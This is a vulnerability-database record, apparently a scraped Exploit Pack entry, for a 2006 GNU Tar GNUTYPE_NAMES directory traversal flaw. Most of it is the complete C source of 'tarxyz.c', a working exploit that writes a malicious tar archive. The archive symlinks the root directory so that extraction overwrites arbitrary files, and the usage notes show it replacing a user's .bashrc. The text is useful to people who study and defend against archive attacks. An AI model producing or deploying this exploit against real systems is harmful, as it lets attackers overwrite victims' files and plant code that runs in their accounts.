DATABASE RESOURCES PRICING ABOUT US

{"lastseen": "2020-04-01T19:04:17", "references": [], "description": "\nGNU Tar 1.1x - GNUTYPE_NAMES Directory Traversal", "edition": 1, "reporter": "Teemu Salmela", "exploitpack": {"type": "remote", "platform": "linux"}, "published": "2006-11-21T00:00:00", "title": "GNU Tar 1.1x - GNUTYPE_NAMES Directory Traversal", "type": "exploitpack", "enchantments": {"dependencies": {}, "score": {"value": -0.0, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.0}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2006-11-21T00:00:00", "id": "EXPLOITPACK:DF11AD35AE397D224F15C876C77D6BBC", "href": "", "viewCount": 3, "sourceData": "/*\nsource: https://www.securityfocus.com/bid/21235/info\n\nGNU Tar is prone to a vulnerability that may allow an attacker to place files and overwrite files in arbitrary locations on a vulnerable computer. These issues present themselves when the application processes malicious archives. \n\nA successful attack can allow the attacker to place potentially malicious files and overwrite files on a computer in the context of the user running the affected application. Successful exploits may aid in further attacks.\n*/\n\n/*\n * tarxyz.c - GNU tar directory traversal exploit.\n * Written by Teemu Salmela.\n *\n * Example usage (creates a tar file that extracts /home/teemu/.bashrc):\n * $ gcc -o tarxyz tarxyz.c\n * $ ./tarxyz > ~/xyz.tar\n * $ mkdir -p /tmp/xyz/home/teemu/\n * $ cp ~/newbashrc.txt /tmp/xyz/home/teemu/.bashrc\n * $ cd /tmp\n * $ tar -rf ~/xyz.tar xyz/home/teemu\n */\n\n#include <string.h>\n#include <stdio.h>\n#include <stdlib.h>\n\nstruct posix_header\n{ /* byte offset */\n char name[100]; /* 0 */\n char mode[8]; /* 100 */\n char uid[8]; /* 108 */\n char gid[8]; /* 116 */\n char size[12]; /* 124 */\n char mtime[12]; /* 136 */\n char chksum[8]; /* 148 */\n char typeflag; /* 156 */\n char linkname[100]; /* 157 */\n char magic[6]; /* 257 */\n char version[2]; /* 263 */\n char uname[32]; /* 265 */\n char gname[32]; /* 297 */\n char devmajor[8]; /* 329 */\n char devminor[8]; /* 337 */\n char prefix[155]; /* 345 */\n /* 500 */\n};\n\n#define GNUTYPE_NAMES 'N'\n\n#define BLOCKSIZE 512\n\nunion block\n{\n char buffer[BLOCKSIZE];\n struct posix_header header;\n};\n\nvoid data(void *p, size_t size)\n{\n size_t n = 0;\n char b[BLOCKSIZE];\n\n while (size - n > 512) {\n fwrite(&((char *)p)[n], 1, 512, stdout);\n n += 512;\n }\n if (size - n) {\n memset(b, 0, sizeof(b));\n memcpy(b, &((char *)p)[n], size - n);\n fwrite(b, 1, sizeof(b), stdout);\n }\n}\n\nint main(int argc, char *argv[])\n{\n char *link_name = \"xyz\";\n union block b;\n char *d;\n int i;\n unsigned int cksum;\n\n if (argc > 1)\n link_name = argv[1];\n\n if (asprintf(&d, \"Symlink / to %s\\n\", link_name) < 0) {\n fprintf(stderr, \"out of memory\\n\");\n exit(1);\n }\n memset(&b, 0, sizeof(b));\n strcpy(b.header.name, \"xyz\");\n strcpy(b.header.mode, \"0000777\");\n strcpy(b.header.uid, \"0000000\");\n strcpy(b.header.gid, \"0000000\");\n sprintf(b.header.size, \"%011o\", strlen(d));\n strcpy(b.header.mtime, \"00000000000\");\n strcpy(b.header.chksum, \" \");\n b.header.typeflag = GNUTYPE_NAMES;\n strcpy(b.header.magic, \"ustar \");\n strcpy(b.header.uname, \"root\");\n strcpy(b.header.gname, \"root\");\n for (cksum = 0, i = 0; i < sizeof(b); i++)\n cksum += b.buffer[i] & 0xff;\n sprintf(b.header.chksum, \"%06o \", cksum);\n fwrite(&b, 1, sizeof(b), stdout);\n data(d, strlen(d));\n}", "cvss": {"score": 0.0, "vector": "NONE"}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645837945, "score": 1659818015}, "_internal": {"score_hash": "02efad87693cb363517ecec8498e4a7f"}}

{}